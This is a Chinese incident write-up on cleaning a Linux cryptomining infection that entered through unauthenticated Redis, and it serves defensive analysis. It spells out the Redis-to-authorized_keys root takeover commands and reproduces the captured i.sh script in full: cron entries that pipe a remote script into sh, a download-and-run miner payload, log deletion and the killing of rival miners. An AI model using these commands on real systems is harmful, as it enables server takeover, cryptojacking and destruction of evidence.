Linux挖矿病毒排查(通过redis入侵服务器原理)
入侵原理
攻击者通过redis连接服务器在服务器上写入ssh免密登录的公钥
1.生成 ssh 公私钥文件, 写入待发送文件* ssh-keygen -t rsa -C "xxx”* echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n" > foo
2.连接目标服务器redis 服务并清除所有数据* redis-cli -h 12.34.56.78* flushall
3.将公钥写入目标机器的authorized_keys 文件* cat foo | redis-cli -h 12.34.56.78 -x set crackit* redis-cli -h 12.34.56.78* config set dir /root/.ssh/* config get dir* config set dbfilename "authorized_keys"
4.远程登录目标服务器* ssh root@12.34.56.78
解决流程
解决步骤:
1.关闭redis未授权端口
2.清理被写入的authorized_keys
3.清除/var/spool/cron目录下的定时任务
4.杀死进程qW3xT.4和ddgs.3016
5.删除/tmp下的执行文件qW3xT.4和ddgs.3016
分析如下:
服务器top占用,存在两个异常线程 qW3xT.4,ddgs.3016<img src="https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/11/16b45b340578e2a6~tplv-t2oaga2asx-zoom-in-crop-mark:4536:0:0:0.image)* 定位两个进程的位置1.linux在启动一个进程时,系统会在/proc下创建一个以PID为名称的文件夹,在这个文件夹下有这个进程的详细信息 exe符号连接就是执行程序的绝对路径;执行程序在/tmp下2.find / -name qW3xT.4, find / -name ddgs.3016 ;执行程序在`/tmp" style="margin: auto" />
清除/tmp下的两个执行文件,过一会儿会再次生成./var/spool/cron目录下 存在计划任务root(或crontab -l && crontab -r查询且清除)
[
](https://link.juejin.cn/?target=https%3A%2F%2Fp1-jj.byteimg.com%2Ftos-cn-i-t2oaga2asx%2Fgold-user-assets%2F2019%2F6%2F11%2F16b45b34046180dd~tplv-t2oaga2asx-image.image "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/11/16b45b34046180dd~tplv-t2oaga2asx-image.image")
*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh计划任务抓取拉取的i.sh如下
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinecho "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/root
echo "*/15 * * * * wget -q -O- http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/rootmkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
echo "*/15 * * * * wget -q -O- http://216.155.135.37:8000/i.sh | sh" >> /var/spool/cron/crontabs/rootrm -rf /var/cache /var/log
ps auxf | grep -v grep | grep /tmp/ddgs.3016 || rm -rf /tmp/ddgs.3016
if [ ! -f "/tmp/ddgs.3016" ]; then
wget -q http://216.155.135.37:8000/static/3016/ddgs.$(uname -m) -O /tmp/ddgs.3016
curl -fsSL http://216.155.135.37:8000/static/3016/ddgs.$(uname -m) -o /tmp/ddgs.3016
fi
chmod +x /tmp/ddgs.3016 && /tmp/ddgs.3016ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill
1. 下载自身并执行写入定时任务
2. `rm -rf /var/cache /var/log`清空系统登录日志
3. 下载主文件`ddgs.3016`并执行
4. 杀死系统中的其他挖矿进程
去脚本中的地址http://216.155.135.37:8000/static/查看,存在如下文件
[
](https://link.juejin.cn/?target=https%3A%2F%2Fp1-jj.byteimg.com%2Ftos-cn-i-t2oaga2asx%2Fgold-user-assets%2F2019%2F6%2F11%2F16b45b3400385114~tplv-t2oaga2asx-image.image "https://p1-jj.byteimg.com/tos-cn-i-t2oaga2asx/gold-user-assets/2019/6/11/16b45b3400385114~tplv-t2oaga2asx-image.image")
disable.sh如下:
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbinmkdir -p /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty
chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/gettyps auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /usr/bin/bsd-port/getty | awk '{print $2}' | xargs kill
此脚本也是限制其他挖空程序运行, yilu 地址https://www.yiluzhuanqian.com/
吾爱破解上对此病毒3014的分析 DDG最新变种3014样本分析
Linux挖矿病毒排查(通过redis入侵服务器原理)相关推荐
- Linux挖矿病毒清理流程
Linux挖矿病毒清理流程 1.前言: 根据阿里云快讯病毒公布: Redis RCE导致h2Miner蠕虫病毒,其利用Redis未授权或弱口令作为入口,使用主从同步的方式从恶意服务器上同步恶意modu ...
- python如何入侵服务器的_通过redis入侵服务器的步骤
通过redis入侵服务器的原理是:利用了redis默认配置,许多用户没有设置访问的key.然后通过向redis把自己的公钥写入到redis,然后利更改redis的数据库文件配置,把数据写入到认证文件. ...
- 服务器Redis实例中挖矿病毒排查及处理
文章系转载,方便整理和归纳,源文地址 https://z.itpub.net/article/detail/E0D0607EFA91E5FA88035F74D040DD26 巧不巧的我的服务器也被挖矿 ...
- linux挖矿的清理工具,Linux挖矿病毒的清除与分析
文章目录 起因 清除过程 确定病因 开始清除 复发 定时任务 update.sh分析 修复 样本分析:networkservice文件的分析 分析准备 功能分析 sysguard 样本下载 *本文中涉 ...
- Linux——挖矿病毒(sysupdate, networkservice进程)清除解决方案
问题描述 Linux进程 阿里云管理控制台看看CPU占用率 解决方案 top命令 获取进程号 查看进程运行的文件位置 ls 命令 ls -l proc/{进程号}/exe sysupdate.netw ...
- Linux挖矿病毒事件应急响应演练(dbused木马)
文章目录 1 环境准备 2 攻击阶段 3 应急响应 3.1 检测阶段 3.2 根除阶段 1 环境准备 **攻击机**:kali(192.168.130.131) **靶机**:Ubuntu(192.1 ...
- Linux挖矿病毒的清除与分析
清除过程 确定病因 这个病毒还不是算很变态,很多挖矿病毒,使用top命令都看不到挖矿程序的进程. 基本可以确定这个占据绝大部分cpu资源的进程sysupdate,就是挖矿程序了,我们需要先找到他. 使 ...
- linux 挖矿病毒解决(syst3md)
早上来了测试服务器哇哇的响,一猜肯定是有异常病毒了,登陆服务器查看果然有问题.内存直接占了2000多,直接执行kill -9 pid 干掉之后,自己又重新起来了.然后就排查 解决过程 1. 先看是否存 ...
- 清除Linux挖矿病毒
今天上服务器发现特别卡,有点奇怪,也没安装什么软件,况且昨天还是好好的. top一下,不看不知道,一看吓一跳,有几个莫名的进程,CPU达到了200%. 查了下资料,才发现是被人利用挖矿了. 不过不要急 ...
最新文章
- windows下安装zabbix_agent
- Mysql limit 子查询
- 分享一篇很不错的CMake入门文章,值得收藏细读!
- Linux 系统之Sysvinit
- Linux网络协议栈:关闭一个还有没发送数据完的TCP连接
- 四面八方的意思是什么,怎么用四面八方造句?
- jquery项目中一些比较常用的简单方法
- 枪口对准Google无人车
- Linux文件的三个时间概念
- Zend Framework学习(4)之前端控制器
- excel中录制宏只执行一半的命令,没有执行全部如何解决?
- sa提开放系统下的虚拟新贵Virtualbox权技巧之xp_regwrite替换sethc.exe
- Android:设置背景色以及theme(主题)设置(一)
- 各大跨境电商卖家不容错过下半年的促销活动安排
- 【最短路】Graph practice T2 drive 题解
- 上海各IT培训机构深度比较
- 600 岁的故宫,也上了人工智能的车
- 王子与公主的爱情故事新结局(转)
- MySQL 整体架构与 SQL 执行原理,数据库事务原理
- 计算机中丢失3dmgame,3dmgamedll.dll